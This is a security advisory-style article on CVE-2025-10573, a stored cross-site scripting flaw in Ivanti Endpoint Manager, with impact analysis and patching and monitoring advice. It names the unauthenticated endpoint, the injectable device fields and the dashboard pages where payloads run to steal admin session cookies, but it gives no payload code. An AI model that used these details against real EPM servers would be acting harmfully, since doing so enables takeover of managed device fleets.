THE CORTEX PROTOCOL
🏠Home🚨Threats🧠Insights📚Books
🚨 CRITICALintel

CVE-2025-10573 - Ivanti EPM Stored XSS Enables Admin Session Hijack

Category:Vulnerabilities & Exploits
Ivanti Endpoint Manager has critical stored XSS (CVE-2025-10573, CVSS 9.0) enabling admin session hijacking without authentication. Attackers inject malicious JavaScript via unauthenticated 'incomingdata' web API that processes device scan data without validation. Payloads embedded in Device ID, Display Name, or OS Name execute when admins view dashboard. Once they steal admin session cookies, attackers control endpoint policies enterprise-wide, push malicious updates, or disable security controls. Affects EPM 2024 SU4 and below. Patched December 9 with EPM 2024 SU4 SR1. Classic XSS-to-admin-compromise chain bypasses MFA since session hijacking occurs post-authentication. No authentication required for initial injection.

🎯CORTEX Protocol Intelligence Assessment

Business Impact: Endpoint management platform compromise gives attackers control over every managed device—install software, disable antivirus, exfiltrate data, deploy ransomware. Unauthenticated attack vector means any network-accessible EPM instance is vulnerable. MFA bypass through session hijacking means traditional authentication controls ineffective. Technical Context: CVE-2025-10573 is stored cross-site scripting in Ivanti EPM incomingdata API endpoint (T1059.007 JavaScript, T1185 Browser Session Hijacking). Attackers POST malicious payloads to /incomingdata/postcgi.exe without authentication. Payloads stored in device database render unsanitized in admin dashboard (frameset.aspx, db_frameset.aspx). When admin views infected page, JavaScript executes, steals session cookies, grants full admin access.

Strategic Intelligence Guidance

  • Upgrade all Ivanti Endpoint Manager installations to version 2024 SU4 SR1 or later on an emergency basis, prioritizing systems reachable from outside dedicated admin networks.
  • Restrict access to the EPM web interface using VPN, IP allowlists and strong authentication, and avoid exposing /incomingdata/postcgi.exe to untrusted networks.
  • Monitor for suspicious device registrations, unusual endpoint names, and anomalous administrative actions that could indicate stored XSS exploitation and admin session hijacking.
  • Incorporate unauthenticated API endpoints such as incomingdata into application security testing and code review processes, ensuring input validation and output encoding for user-controlled fields.

CVEs

CVE-2025-10573

Vendors

IvantiIvanti Endpoint Manager

Targets

Endpoint management serversEnterprise Windows fleetsIT operations teams

Tags

#cve-2025-10573#ivanti-epm#stored-xss#admin-session-hijack#web-application-security#critical-vulnerability
Intelligence Source: CVE-2025-10573 - Ivanti EPM Stored XSS Enables Admin Session Hijack | Dec 11, 2025
More stories in Critical Vulnerabilities